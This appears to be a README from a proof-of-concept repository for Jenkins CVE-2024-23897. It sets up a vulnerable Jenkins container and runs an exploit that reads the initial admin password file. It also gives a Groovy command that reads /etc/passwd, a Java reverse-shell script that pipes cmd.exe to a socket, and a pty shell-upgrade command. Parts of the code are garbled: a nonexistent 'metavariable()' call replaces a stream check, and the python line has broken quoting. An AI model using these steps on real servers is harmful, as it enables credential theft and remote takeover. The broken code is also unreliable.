# Exploit-CVE-2024-23897
# Run the Container
docker run -p 8080:8080 --name vulnerable-jenkins -d jenkins/jenkins:2.441-jdk17
# Check logs
docker logs <machine_name>
# Fetch docker machines IP:
docker inspect vulnerable-jenkins | grep IPAddress
#Exploitation Code:
python3 exploit.py --target http://127.0.0.1:8080 --file /var/jenkins_home/secrets/initialAdminPassword --request-timeout 30
# Groovy Script:
println "cat /etc/passwd".execute().text
# RCE
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(metavariable()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
# To set environmental variables
export TERM=xterm
#For interactive shell
python -c 'import pty'; pty.spawn("/bin/bash")'
[4.0K] /data/pocs/f376479b9ae5282db46d9fef2b331979f9f036e0
├── [6.1K] exploit.py
└── [1.1K] README.md
1 directory, 2 files